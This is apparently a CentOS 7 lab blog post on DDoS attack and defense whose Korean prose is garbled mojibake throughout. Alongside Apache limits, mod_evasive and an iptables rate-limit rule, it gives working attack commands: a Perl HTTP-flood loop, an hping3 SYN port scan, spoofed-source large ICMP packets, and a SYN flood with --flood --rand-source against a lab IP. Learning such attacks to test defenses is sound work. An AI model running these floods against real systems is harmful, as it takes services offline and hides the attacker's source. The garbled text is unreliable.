์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ’ป Linux

CentOS7 DDOS ๊ณต๊ฒฉ ๋ฐ ๋ฐฉ์–ด

  • -
๋ฐ˜์‘ํ˜•

Apache ๋ฒ„์ „

vim /etc/httpd/conf/httpd.conf
	> # ServerSignature Off
MaxRequestWorkers 500 # ๋™์‹œ ์ ‘์†์ž ์ˆ˜ ์ œํ•œ (DDOS๋ง‰๊ธฐ)
MaxKeepAliveRequests 500 # ํ•œ ์œ ์ €์˜ ์š”์ฒญ ์ˆ˜ ์ œํ•œ
TimeOut 300 # 5๋ถ„๋™์•ˆ ์‚ฌ์šฉํ•˜์ง€ ์•Š์œผ๋ฉด ์„ธ์…˜ ๋Š๊ธฐ

DDOS ๋ง‰๋Š” ๋ชจ๋“ˆ
yum -y install epel-release
yum -y install mod_evasive

vim /etc/httpd/conf.d/mod_evasive.conf

systemctl restart httpd
DDOS ๊ณต๊ฒฉ
systemctl stop firewalld
setenforce 0

yum -y install epel-release
yum -y install mod_evasive

vim /usr/share/doc/mod_evasive-1.10.1/test.pl # perl ํŒŒ์ผ ์ˆ˜์ •

for(0..100) {
  my($response);
  my($SOCKET) = new IO::Socket::INET( Proto   => "tcp",
                                      PeerAddr=> "192.168.111.100:80");
  if (! defined $SOCKET) { die $!; }
  print $SOCKET "GET /?$_ HTTP/1.0\\r\\nHost:127.0.0.1\\r\\n\\r\\n";

perl /usr/share/doc/mod_evasive-1.10.1/test.pl # perl ์‹คํ–‰

DDOS ( ์„œ๋น„์Šค ๊ฑฐ๋ถ€ ๊ณต๊ฒฉ )

hping3 -1 -c 5 192.168.111.100 (icmp -1 udp -2)
hping3 --scan 1-1024 -S 192.168.111.100

# rand atack ๊ณต๊ฒฉ ( ๋ˆ„๊ฐ€ ๊ณต๊ฒฉ์„ ํ•œ์ง€ ๋ชจ๋ฅด๊ฒŒ ์ถœ๋ฐœ์ง€ ์ˆจ๊น€ )
hping3 -1 -a 10.20.30.40 -d 65000 192.168.111.100
# -a : ์‹œ์ž‘ ip์ฃผ์†Œ -d : ๋ฐ์ดํ„ฐ ํฌ๊ธฐ

# flooding ๊ณต๊ฒฉ
hping3 -S -d 64 192.168.111.100 -p 80 --flood --rand-source
DDOS ๋ง‰๊ธฐ
iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 1 --hitcount 10 -j DROP
๋ฐ˜์‘ํ˜•
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.